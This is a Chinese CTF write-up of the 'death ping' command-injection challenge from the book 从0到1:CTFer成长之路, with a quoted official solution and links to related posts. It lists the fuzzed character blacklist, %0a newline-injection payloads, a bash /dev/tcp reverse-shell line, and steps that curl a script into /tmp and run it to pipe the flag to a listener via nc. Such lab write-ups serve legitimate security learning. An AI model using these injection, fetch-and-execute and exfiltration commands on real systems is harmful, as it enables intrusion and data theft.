《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
[第二章 web进阶]死亡ping命令
- 准备工作
- 开始做题
- <1>.编写1.sh,内容如下:
- <2>.请求bash文件到tmp目录
- <3>.给bash加权限
- <4>.进行监听8080端口
- <5>.执行bash文件
介绍:记录一下笔记,方便以后迅速回忆使用。
《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》
准备工作
首先在BUUCTF/Basic/Linux Labs开一个靶机
使用ssh命令连接
ssh -p 28412 root@node3.buuoj.cn
node3.buuoj.cn:28412
C:\WINDOWS\system32>ssh -p 28412 root@node3.buuoj.cn
root@node3.buuoj.cn's password:
Last login: Fri Feb 26 02:26:13 2021 from 172.16.128.14
- 其实这也是道题,也是有flag,好吧,先不管这个
root@eef94e4eb444:/# cd ..
root@eef94e4eb444:/# sl
-bash: sl: command not found
root@eef94e4eb444:/# ls
bd_build boot etc get-pip.py lib media opt root sbin sys usr
bin dev flag.txt home lib64 mnt proc run srv tmp var
root@eef94e4eb444:/# cat flag.txt
flag{a22846a4-5a80-4578-8a3c-22cd4e772e28}
root@eef94e4eb444:/#
- 查看本机公网IP
root@ea1f42b1ee35:/# curl cip.cc
IP : 111.73.45.68
地址 : 中国 江西 上饶
运营商 : 电信数据二 : 江西省上饶市 | 电信数据三 : 中国江西上饶 | 电信URL : http://www.cip.cc/111.73.45.68
开始做题
存在一些黑名单过滤的,被拦截时候显示IP包含恶意字符,那我们先把这些字符找出来,这样后面就能更顺利。
一开始我的BurpSuite有中文乱码问题,先在这里修改一下,
快速解决BurpSuite中文乱码问题.或者更简单的方法就是就三种反馈结果,除去另外两个就是我们要,
Result:
IP Ping 成功.
IP Ping 失败.
IP包含恶意字符.
- (及利用fuzz的方式)所以知道能够知道过滤了以下字符:
["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"", "'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"];
- 通过%0a能够注入新的一条命令进行执行。
ip=127.0.0.1%0als
- 由于docker是没有bash、python程序的,并且sh反弹是不行的。
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
- 目前是能通过折中的方式执行任意命令
<1>.编写1.sh,内容如下:
ls
cat /FLAG | nc your_buu_ip 8089
- 详细操作过程
root@eef94e4eb444:/# ls
root@ea1f42b1ee35:~# cd ../
root@ea1f42b1ee35:/# ls
bd_build boot etc get-pip.py lib media opt root sbin sys usr
bin dev flag.txt home lib64 mnt proc run srv tmp var
root@ea1f42b1ee35:/# vim 1.sh
root@ea1f42b1ee35:/# cat 1.sh
ls
cat /FLAG | nc 111.73.45.68 8089
<2>.请求bash文件到tmp目录
127.0.0.1%0acurl your_buu_ip/1.sh > /tmp/1.sh #请求bash文件到tmp目录
127.0.0.1%0acurl 111.73.45.68/1.sh > /tmp/1.sh
<3>.给bash加权限
127.0.0.1%0achmod 777 /tmp/1.sh
<4>.进行监听8080端口
- 172.16.128.14的机器上进行监听8080端口
nc -lvp 8089 #your_buu_ip的机器上进行监听8089端口
<5>.执行bash文件
127.0.0.1%0ash /tmp/1.sh #执行bash文件
但我试过8080,8089.都没有flag回显,后续原因我再看看,
但官方流程就是这样
本文参考
BUUCTF–[第二章 web进阶]死亡ping命令官方Wp:
wp通过可以发现是存在一些黑名单过滤的,被拦截时候显示IP包含恶意字符。利用fuzz的方式能够知道过滤了以下字符:["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"", "'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"];通过%0a能够注入新的一条命令进行执行。POST /ping.php HTTP/1.1
Host: testabc.com:53340
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32ip=127.0.0.1%0awhoami>/tmp/aaaaa由于docker是没有bash、python程序的,并且sh反弹是不行的。bash -i >& /dev/tcp/127.0.0.1/8080 0>&1目前是能通过折中的方式执行任意命令请求bash文件到tmp目录
127.0.0.1%0acurl 172.16.128.14/1.sh > /tmp/1.sh给bash加权限
127.0.0.1%0achmod 777 /tmp/1.sh10.211.55.2的机器上进行监听8080端口
nc -l 8080执行bash文件
127.0.0.1%0ash /tmp/1.sh1.sh内容为
ls
cat /FLAG | nc 10.211.55.2 8080
BUUCTF-Basic-Linux Labs
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令相关推荐
- 《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-2
[第一章 web入门]SQL注入-2 一.信息收集 1.首页 2.登录成功会跳转到 3.进行测试判断 二.尝试破解 1.用post型的sqlmap破解 <1>.首先,开burp截包 < ...
- 从0到1:CTFer成长之路
作者:Nu1L战队 出版社:电子工业出版社 品牌:电子工业出版社 出版时间:2020-10-01 从0到1:CTFer成长之路
- 《从0到1:CTFer成长之路》 [第一章 web入门] 常见的搜集
<从0到1:CTFer成长之路> [第一章 web入门] 常见的搜集 启动环境: 提示为敏感文件,首先对网站目录进行扫描: 得到如上页面,首先访问robots.txt页面: 得到flag1 ...
- 从0到1:CTFer成长之路docker环境搭建
1. 安装 docker 使用官方安装脚本安装 sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使 ...
- CTF学习记录 i春秋 《从0到1:CTFer成长之路》文件上传
21.10.19 第二次开始学习CTF 感觉很有收获 至少有让自己忙起来了的感觉 感觉有一些学习状态了 打算重新记录一下学习笔记!加油 我会坚持下去的! 题目代码 首先附上题目的代码段(不完整) sh ...
- 《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF
还是任意文件读取漏洞 进入坏境 点入链接 这边可以读取文件 试一试article?name=../../../etc/passwd 读不到flag /proc详解 linux进程与它的文件描述符./p ...
- 《从0到1:CTFer成长之路》SQL注入-2
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境,老规矩先查看源码 有提示,那就先用提示来做吧,简单快捷易上手了属于是: 手工方法: 1. 随便输入一个账号试试: 输入ad ...
- 《从0到1:CTFer成长之路》1.3 任意文件读取漏洞
文章目录 1.3.1 文件读取漏洞常见触发点 1.3.1.1 web语言 1. PHP 2.python 3.Java 4.Ruby 5.Node 1.3.1.2 中间件.服务件相关 1.Nginx错 ...
- 《从0到1:CTFer成长之路》粗心的小李
前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 这边给了提示,是吧git放到了外网环境,直接扫一下目录吧,查找一下git目录 git目录下是有东西的 所以我们可以利 ...
- 《从0到1:CTFer成长之路》常见的搜集
前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 看到信息搜集,直接用扫目录软件开扫 扫到了这个网页,我们进去查看一下 发现他给我们提示了一个网址,我们进入这个网址 ...
最新文章
- Java中的中介器设计模式
- SQL错误提示档案(3):SQL Server连接中的四个最常见错误
- boost::tuple用法的测试程序
- CSS3展开带弹性动画的手风琴菜单
- Cloud for Customer work center的数据是如何从ABAP Netweaver返回给前端的
- 本月风味– Neo4j和Heroku
- VALSE2019总结(6)-年度总结-物体检测
- 错误记录(二)java.lang.NoSuchMethodError: antlr.collections.AST.getLine()I错误时的原因及解决办法
- winform checkedlistbox不显示复选框_据说90%的人都不知道怎么解决这个Word问题
- (转)高效的MySQL分页
- 【计网知识点总结】1概述
- ROS学习(一)Ros 中使用kinect
- 苹果手机登录华为账号无法连接服务器,华为手机登录华为帐号时,显示“没法连接到服务器”是什么情况?...
- 认识计算机教案模板表格,word表格制作教学设计范文
- 20-40K/月,百度车联网招聘多岗位Android工程师(地点:深圳)
- 5java讲解(xy)
- 线性回归、岭回归和Lasso回归
- word技巧-大纲与目录
- gem是什么证书_珠宝鉴定:EGL证书到底是一个什么样的证书?
- Mikrotik RouterOS-脚本-花生壳动态域名解析